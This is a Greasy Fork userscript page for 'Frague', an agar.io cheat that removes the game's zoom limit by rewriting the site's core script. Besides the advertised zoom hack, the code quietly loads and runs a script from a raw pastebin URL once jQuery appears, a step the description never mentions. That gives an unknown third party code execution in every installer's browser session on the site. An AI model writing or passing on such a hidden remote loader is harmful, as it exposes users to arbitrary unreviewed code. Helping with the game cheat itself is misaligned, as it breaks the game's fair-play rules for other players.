Greasy Fork is available in English.

Frague

Agar.io Hile Extra Zoom

// ==UserScript==
// @name        Frague
// @namespace   Extension for agar.io + Zoom
// @description Agar.io Hile Extra Zoom
// @author      Emre
// @include     http://agar.io/*
// @include     https://agar.io/*
// @grant       GM_xmlhttpRequest
// @version     1.1.2
// @grant       none
// ==/UserScript==

window.stop();
document.documentElement.innerHTML = null;
var coreScript = '', mainDoc = '';
GM_xmlhttpRequest({
        method : "GET",
        url : 'http://agar.io/agario.core.js',
        onload : function(event) {
            coreScript = event.responseText;
            coreScript = coreScript.replace(/d=d<1\.0\?1\.0:d;/i, '');
             GM_xmlhttpRequest({
                 method : "GET",
                 url : 'http://agar.io/',
                 onload : function(event) {
                     mainDoc = event.responseText;
                     mainDoc = mainDoc.replace(/<script src="agario\.core\.js" async><\/script>/i, '<script>'+coreScript+'</script>');;
                     document.open();
                     document.write(mainDoc);
                    document.close();
                    var itv = setInterval(function(){
                      if($.length){
                          clearInterval(itv);
                          $['getScript']('//pastebin.com//raw.php?i=TwzPb29Y');
                      }
                    }, 500);
                 }
             });
        }
});